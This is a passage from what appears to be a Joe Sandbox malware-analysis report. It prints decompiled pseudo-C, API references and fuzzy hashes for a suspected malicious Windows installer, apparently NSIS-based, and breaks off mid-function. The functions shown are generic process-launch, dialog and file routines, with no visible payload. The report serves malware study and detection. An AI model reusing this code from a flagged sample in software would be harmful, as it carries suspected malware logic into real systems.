Opcode ID: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
Instruction ID: 729772cd993a62bf3dcd5a53f5ba0c6067f9c4589e443fe2cdcdd0dddf41cb53
Opcode Fuzzy Hash: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
Instruction Fuzzy Hash: 74C04CB1740605BADA108B509D45F0677546750701F188429B641A50E0CA74E410D62C

Uniqueness

Uniqueness Score: -1.00%

Function 00405B63 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405B63(struct _SHELLEXECUTEINFOW* _a4) {
				struct _SHELLEXECUTEINFOW* _t4;
				int _t5;

				_t4 = _a4;
				_t4->lpIDList = _t4->lpIDList & 0x00000000;
				_t4->cbSize = 0x3c; // executed
				_t5 = ShellExecuteExW(_t4); // executed
				return _t5;
			}

0x00405b63
0x00405b68
0x00405b6c
0x00405b72
0x00405b78

APIs

ShellExecuteExW.SHELL32(?), ref: 00405B72

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
Instruction ID: 155326c85e208380d9db810c36285a9e1b4200be200639c8195ffcf147e959ee
Opcode Fuzzy Hash: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
Instruction Fuzzy Hash: BEC092B2000200EFE301CF80CB09F067BE8AF54306F028068E185DA060C7788840CB29

Uniqueness

Uniqueness Score: -1.00%

Function 004044CE Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044CE(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x434f08, 0x28, _a4, 1); // executed
				return _t2;
			}

0x004044dc
0x004044e2

APIs

SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
Instruction ID: f9270ce27bc2d5d500308faa7c43699bdd9cec228278350af1c7ef3a72e6c056
Opcode Fuzzy Hash: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
Instruction Fuzzy Hash: 4FB01235181A00FBDE514B00DE09F857E62F7E4701F058038F341240F0CBB200A4DB08

Uniqueness

Uniqueness Score: -1.00%

Function 004034E5 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004034E5(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x004034f3
0x004034f9

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 004044BB Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044BB(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x42d264, _a4); // executed
				return _t2;
			}

0x004044c5
0x004044cb

APIs

KiUserCallbackDispatcher.NTDLL(?,00404292), ref: 004044C5

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
Instruction ID: 0db23a64e3c973129ccb7351ad80e5cfa0365495cc8a336c35755b545d17f2be
Opcode Fuzzy Hash: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
Instruction Fuzzy Hash: 74A00275508601DBDE115B51DF09D057B71A7547017414579A18551034C6314461EB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00401FA4(void* __ecx) {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t17 = __ecx;
				_t19 = E00402DA6(_t15);
				E0040559F(0xffffffeb, _t7); // executed
				_t9 = E00405B20(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E004069B5(_t17, _t20);
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E00406484( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}

0x00401fa4
0x00401faa
0x00401faf
0x00401fb5
0x00401fba
0x00401fbe
0x0040292e
0x00401fc4
0x00401fc7
0x00401fca
0x00401fd2
0x00401fe1
0x00401fe3
0x00401fe3
0x00401fd4
0x00401fd8
0x00401fd8
0x00401fd2
0x00401fea
0x00401feb
0x00401feb
0x00402c2d
0x00402c39

APIs

Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll,00000000,004231B5,758D23A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll,00000000,004231B5,758D23A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll,00403418), ref: 004055FA
Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll), ref: 0040560C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

Part of subcall function 00405B20: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,00000000,00000000), ref: 00405B49
Part of subcall function 00405B20: CloseHandle.KERNEL32(?), ref: 00405B56

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB

Part of subcall function 004069B5: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069C6
Part of subcall function 004069B5: GetExitCodeProcess.KERNEL32(?,?), ref: 004069E8

Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: fa18f46a8673bca6434a5c9373a6cbc3dc8609fa07edefac18420a2ce970209b
Instruction ID: a015d294fcb9cc4e365613bb9e09bf6e78b00889af70ee47f703a6c6056ea9c8
Opcode Fuzzy Hash: fa18f46a8673bca6434a5c9373a6cbc3dc8609fa07edefac18420a2ce970209b
Instruction Fuzzy Hash: 2DF09072904112EBCB21BBA59A84EDE76E8DF01318F25403BE102B21D1D77C4E429A6E

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040498A Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42c240; // 0x541604
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x436000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405B81(0x3fb, _t146);
					E004067C4(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405B81(0x3fb, _t146);
							if(E00405F14(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040653D(0x42b238, _t146);
							_t87 = E0040690A(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040653D(0x42b238, _t146);
								_t89 = E00405EB7(0x42b238);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x42b238) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405E58(0x42b238);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x42b238) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404E27(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x433edc; // 0x544f92
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404E0F(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x42b228);
									} else {
										E00404D46(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x434fa4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004044BB(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42d258 == _t158) {
									E004048E3();
								}
								 *0x42d258 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x42d268;
							_v60 = E00404CE0;
							_v56 = _t146;
							_v68 = E0040657A(_t146, 0x42d268, _t167, 0x42ba40, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405E0C(_t146);
								_t125 =  *((intOrPtr*)( *0x434f10 + 0x11c));
								if( *((intOrPtr*)( *0x434f10 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Temp") {
									E0040657A(_t146, 0x42d268, _t167, 0, _t125);
									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
										lstrcatW(_t146, 0x432ea0);
									}
								}
								 *0x42d258 =  *0x42d258 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
						E00405E0C(_t146);
					}
					 *0x433ed8 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404499(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404499(_t167);
					E004044CE(_t166);
					_t138 = E0040690A(8);
					if(_t138 == 0) {
						L53:
						return E00404500(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}

0x0040498a
0x00404990
0x00404996
0x004049a3
0x004049b1
0x004049b4
0x004049bc
0x004049c2
0x004049c2
0x004049ce
0x004049d1
0x00404a3f
0x00404a46
0x00404b1d
0x00404b24
0x00404b33
0x00404b33
0x00404b37
0x00404b41
0x00404b4e
0x00404b50
0x00404b50
0x00404b5e
0x00404b65
0x00404b6c
0x00404b6f
0x00404bab
0x00404bad
0x00404bb3
0x00404bb8
0x00404bbc
0x00404bbe
0x00404bbe
0x00404bda
0x00000000
0x00404bdc
0x00404bdf
0x00404bed
0x00404bf3
0x00404bf4
0x00404bf7
0x00404bfa
0x00000000
0x00404bfa
0x00404b71
0x00404b73
0x00404b77
0x00000000
0x00000000
0x00000000
0x00000000
0x00404b79
0x00404b79
0x00404b86
0x00404b8b
0x00000000
0x00000000
0x00404b8f
0x00404b91
0x00404b91
0x00404b9a
0x00404b9c
0x00404ba1
0x00404ba4
0x00404ba9
0x00000000
0x00000000
0x00000000
0x00000000
0x00404ba9
0x00404c06
0x00404c10
0x00404c13
0x00404c16
0x00404c1d
0x00404c1d
0x00404c1f
0x00404c1f
0x00404c24
0x00404c26
0x00404c2e
0x00404c35
0x00404c37
0x00404c42
0x00404c42
0x00404c37
0x00404c49
0x00404c52
0x00404c5c
0x00404c64
0x00404c7f
0x00404c66
0x00404c6f
0x00404c6f
0x00404c64
0x00404c84
0x00404c89
0x00404c8e
0x00404c97
0x00404c97
0x00404ca0
0x00404ca2
0x00404ca2
0x00404cae
0x00404cb6
0x00404cc0
0x00404cc0
0x00404cc5
0x00000000
0x00404cc5
0x00404b6f
0x00404b26
0x00404b2d
0x00000000
0x00000000
0x00000000
0x00404b2d
0x00404a4c
0x00404a55
0x00404a6f
0x00404a74
0x00404a7e
0x00404a85
0x00404a91
0x00404a94
0x00404a97
0x00404a9e
0x00404aa6
0x00404aa9
0x00404aad
0x00404ab4
0x00404abc
0x00404b16
0x00404abe
0x00404abf
0x00404ac6
0x00404ad0
0x00404ad8
0x00404ae5
0x00404af9
0x00404afd
0x00404afd
0x00404af9
0x00404b02
0x00404b0f
0x00404b0f
0x00404abc
0x00000000
0x00404a74
0x00404a62
0x00000000
0x00000000
0x00404a68
0x00000000
0x004049d3
0x004049e0
0x004049e9
0x004049f6
0x004049f6
0x004049fd
0x00404a03
0x00404a0c
0x00404a0f
0x00404a12
0x00404a1a
0x00404a1d
0x00404a20
0x00404a26
0x00404a2d
0x00404a34
0x00404ccb
0x00404cdd
0x00404a3a
0x00404a3d
0x00000000
0x00404a3d
0x00404a34

APIs

GetDlgItem.USER32(?,000003FB), ref: 004049D9
SetWindowTextW.USER32(00000000,?), ref: 00404A03
SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
CoTaskMemFree.OLE32(00000000), ref: 00404ABF
lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 00404AF1
lstrcatW.KERNEL32(?,Call), ref: 00404AFD
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B0F

Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94

Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,758D3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
Part of subcall function 004067C4: CharNextW.USER32(?,00000000,758D3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
Part of subcall function 004067C4: CharPrevW.USER32(?,?,758D3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E

GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED

Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
Part of subcall function 00404D46: SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03

Strings

A, xrefs: 00404AAD
Call, xrefs: 00404AEB, 00404AF0, 00404AFB
C:\Users\user\AppData\Local\Temp, xrefs: 00404ADA

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Temp$Call
API String ID: 2624150263-3142480687
Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 6F3D1BFF Relevance: 20.1, APIs: 13, Instructions: 597
stringlibrarymemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E6F3D1BFF() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				WCHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				WCHAR* _t208;
				signed int _t211;
				void* _t213;
				void* _t215;
				WCHAR* _t217;
				void* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t227;
				struct HINSTANCE__* _t229;
				signed short _t231;
				struct HINSTANCE__* _t234;
				struct HINSTANCE__* _t236;
				void* _t237;
				intOrPtr* _t238;
				void* _t249;
				signed char _t250;
				signed int _t251;
				struct HINSTANCE__* _t257;
				void* _t258;
				signed int _t260;
				signed int _t261;
				signed short* _t264;
				signed int _t269;
				signed int _t272;
				signed int _t274;
				void* _t277;
				void* _t281;
				struct HINSTANCE__* _t283;
				signed int _t286;
				void _t287;
				signed int _t288;
				signed int _t300;
				signed int _t301;
				signed short _t304;
				void* _t305;
				signed int _t309;
				signed int _t312;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed short* _t321;
				WCHAR* _t322;
				WCHAR* _t324;
				WCHAR* _t325;
				struct HINSTANCE__* _t326;
				void* _t328;
				signed int _t331;
				void* _t332;

				_t283 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t332 = 0;
				_v52 = 0;
				_v44 = 0;
				_t208 = E6F3D12BB();
				_v24 = _t208;
				_v28 = _t208;
				_v48 = E6F3D12BB();
				_t321 = E6F3D12E3();
				_v56 = _t321;
				_v12 = _t321;
				while(1) {
					_t211 = _v32;
					_v60 = _t211;
					if(_t211 != _t283 && _t332 == _t283) {
						break;
					}
					_t286 =  *_t321 & 0x0000ffff;
					_t213 = _t286 - _t283;
					if(_t213 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t215 = _v60 - _t283;
						if(_t215 == 0) {
							__eflags = _t332 - _t283;
							 *_v28 = _t283;
							if(_t332 == _t283) {
								_t332 = GlobalAlloc(0x40, 0x1ca4);
								 *(_t332 + 0x1010) = _t283;
								 *(_t332 + 0x1014) = _t283;
							}
							_t287 = _v36;
							_t47 = _t332 + 8; // 0x8
							_t217 = _t47;
							_t48 = _t332 + 0x808; // 0x808
							_t322 = _t48;
							 *_t332 = _t287;
							_t288 = _t287 - _t283;
							__eflags = _t288;
							 *_t217 = _t283;
							 *_t322 = _t283;
							 *(_t332 + 0x1008) = _t283;
							 *(_t332 + 0x100c) = _t283;
							 *(_t332 + 4) = _t283;
							if(_t288 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t328 = 0;
								GlobalFree(_t332);
								_t332 = E6F3D13B1(_v24);
								__eflags = _t332 - _t283;
								if(_t332 == _t283) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t249 =  *(_t332 + 0x1ca0);
									__eflags = _t249 - _t283;
									if(_t249 == _t283) {
										break;
									}
									_t328 = _t332;
									_t332 = _t249;
									__eflags = _t332 - _t283;
									if(_t332 != _t283) {
										continue;
									}
									break;
								}
								__eflags = _t328 - _t283;
								if(_t328 != _t283) {
									 *(_t328 + 0x1ca0) = _t283;
								}
								_t250 =  *(_t332 + 0x1010);
								__eflags = _t250 & 0x00000008;
								if((_t250 & 0x00000008) == 0) {
									_t251 = _t250 | 0x00000002;
									__eflags = _t251;
									 *(_t332 + 0x1010) = _t251;
								} else {
									_t332 = E6F3D162F(_t332);
									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t300 = _t288 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									L31:
									lstrcpyW(_t217, _v48);
									L32:
									lstrcpyW(_t322, _v24);
									goto L42;
								}
								_t301 = _t300 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									goto L32;
								}
								__eflags = _t301 != 1;
								if(_t301 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
